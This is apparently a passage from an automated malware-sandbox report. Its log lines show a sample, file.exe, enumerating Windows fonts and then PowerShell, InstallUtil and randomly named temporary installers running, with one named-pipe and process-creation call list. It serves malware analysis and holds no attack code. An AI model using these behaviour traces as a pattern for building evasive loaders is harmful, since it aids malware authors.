                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpQueries volume information: C:\Users\user\AppData\Local\Web Link Analyzer\libgcc_s_dw2-1.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmpQueries volume information: C:\Users\user\AppData\Local\Web Link Analyzer\libgcc_s_dw2-1.dll VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpCode function: 14_2_004585C8 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,14_2_004585C8
